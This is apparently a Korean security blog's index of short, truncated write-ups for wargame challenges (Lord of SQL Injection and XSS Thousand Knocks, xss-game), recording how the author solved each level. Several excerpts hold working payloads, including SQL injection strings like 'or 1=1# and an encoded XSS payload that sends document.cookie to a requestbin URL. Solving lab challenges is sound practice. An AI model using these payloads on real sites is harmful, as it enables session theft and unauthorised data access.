WebHacking
-
LOS goblin writeupWebHacking/Lord of SQL injection Write-Up 2018. 7. 20. 16:20
LOS goblin writeup 지금 id에 guest가 있고, if($result['id']) echo "Hello {$result[id]}"; if($result['id'] == 'admin') solve("goblin"); id가 admin이 되면 풀리는 문제인듯하다!! http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?id=admin&no=1234 이렇게 넣어도 query : select id from prob_goblin where id='guest' and no=1234 쿼리 guest는 바뀌지 않는다. 음...guest를 어떻게 없앨까...? 처음에는 주석으로 guest를 없애서 admin을 넣는 문제인거같은데 도저히 그건 ..
-
LOS cobolt writeupWebHacking/Lord of SQL injection Write-Up 2018. 7. 20. 15:44
LOS cobolt writeup 우선 문제를 보면 get방식으로 되어있고, pw에 md5 암호가 걸려있는 것을 확인할 수 있다. http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin&pw=1234 .위와 같이 query : select id from prob_cobolt where id='admin' and pw=md5('1234') 이렇게 나오고 1번문제 푼것과 같이 넣어보면, http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=%27or%201=1%23&pw= 이렇게 나온다...음... 이 방법은 아닌가보다. if($result['id'] == 'adm..
-
Los gremlin writeupWebHacking/Lord of SQL injection Write-Up 2018. 7. 20. 15:30
LOS gremlin writeup 문제 확인을 해보면, 위와 같이 나와있고, GET방식으로 되어있음을 알게 된다. http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id=yeali&pw=1234 이렇게 입력을 하면, query : select id from prob_gremlin where id='yeali' and pw='1234' 쿼리문이 이렇게 변경되게 된다. id와 pw를 성립하게 해주면 되는 문제인듯하다. http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id='or 1=1#&pw= 이렇게 해서 #뒤에는 주석처리를 해주려고 했으나 #이 안들어간다. url 인코..
-
XSS Thousand Knocks Stage4 write upWebHacking/XSS Thousand Knocks Write-Up 2018. 7. 18. 18:27
여기서 시간 많이 썼다. 문제 3번이랑 비슷한데 똑같이 하면 안된다. 그래서 태그를 닫아서 스크립트를 전달하면 ok가 뜬다. http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q='> 이렇게 성공. ps. 이거 textarea로 문제 풀 수 있던데, 어떻게 풀리는지 의문이다. http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q=%22%3E%3C/textarea%3E%3Cscript%3Elocation.href=%27http://requestbin.fullcontact.com/v9x9evv9?a=%27%2Bdocument.cookie%3C/script%3E%3Ctextarea%3E
-
XSS Thousand Knocks Stage3 write upWebHacking/XSS Thousand Knocks Write-Up 2018. 7. 18. 17:28
수천 번의 노크 XSS 단계 3번 write up 링크를 접속하니 Link라는 href가 하나 있고, 접속을 하면 기존과 같게 접속이 된다. 이거 xss game 5번에서 비슷한 문제를 풀어보았기에 비슷하게 하면 된다고 생각을 했음. ?q=' ' 2번과 같이 넣어놓고 link를 누르면 되는거같다!!! 근데 자꾸 404 not found | nginx로 간다... 음 nginx? ** nginx : 아파치 같은 웹서버인듯하다. 한국에서 27%의 점유율을 가지고 있고, 아파치 보다 더 적은 자원으로 더 빠르게 데이터를 서비스 할 수 있는 웹 서버 소프트웨어이다. 페이지 소스 보기를 하면 Link 이렇게 있음을 보게 된다. 그럼 href에서 빠져나와 내가 원하는 스크립트를 실행시키게 해야 되는것같다. http..
-
XSS Thousand Knocks Stage2 write upWebHacking/XSS Thousand Knocks Write-Up 2018. 7. 18. 16:39
링크를 들어가면 아래와 같은 링크로 들어가게 된다. http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=XSS q=뒤에 있는 내용이 출력되는 기능을 가지고 있는 웹페이지이다. 그래서 아래와 같은 url을 보내보았다. http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q= 그런데 이렇게 보내니까 failed csrf check! 라고 뜨면서 실패가 된다. 고민을 해보다가 +의 문제인거같아서 http encoding하면 나오는 %2B를 넣어서 보내보았다. http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q= 근데 자꾸 ..
-
XSS thousand Knocks stage1 writeupWebHacking/XSS Thousand Knocks Write-Up 2018. 7. 18. 15:18
XSS문제를 더 풀고 싶어서 XSS Thousand Knocks 풀게 됨. https://knock.xss.moe/index 우선 Stage1은 튜토리얼이었는데 어떻게 푸는건지 몰라서 시간이 좀 걸림. 위와 같이 써있는데 서버를 활용해서 XSS 공격을 보낸 후에 서버에 오는 플래그를 읽으면 되는 문제라고 한다. 처음에는 vm 서버를 활용해서 문제를 풀려고 했으나 외부 접속을 막고 있는지 문제가 풀리지 않았다. 그래서 http://requestbin.fullcontact.com을 활용하였다. 해당 문제에 1번에 위와 같이 적어있어서 해당 페이지에 접속해http://8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?location=%22http://examp..
-
Xss game level 6 write upWebHacking/Xss-game Write-Up 2018. 7. 17. 18:31
Xss game level 6 write up - 마지막 #번역미션 설명 : 복잡한 웹 응용 프로그램에는 URL 매개변수의 값 또는 일부의 값에 따라 Javascript 라이브러리를 동적으로 로드할 수 있는 location.hash 기능있습니다. 스크립트를 비롯한 잠재적으로 위험한 유형의 XMLHttpRequest 데이터를 로드할 때마다 심각한 취약점을 초래할 수 있수 있기에 사용자 입력이 url에 영향을 미치도록 허용하는 것은 매우 까다로운 작업입니다. 미션 목표 : 응용 프로그램이 외부 파일을 요청하도록 하여 alert()를 실행하도록 하시오. #분석 우선 미션 설명에서 얻을 수 있는 정보는 url를 이용해야 되고 그 중 js라이브러리를 동적으로 로드할 수 있는 함수 중 location.hash를 사..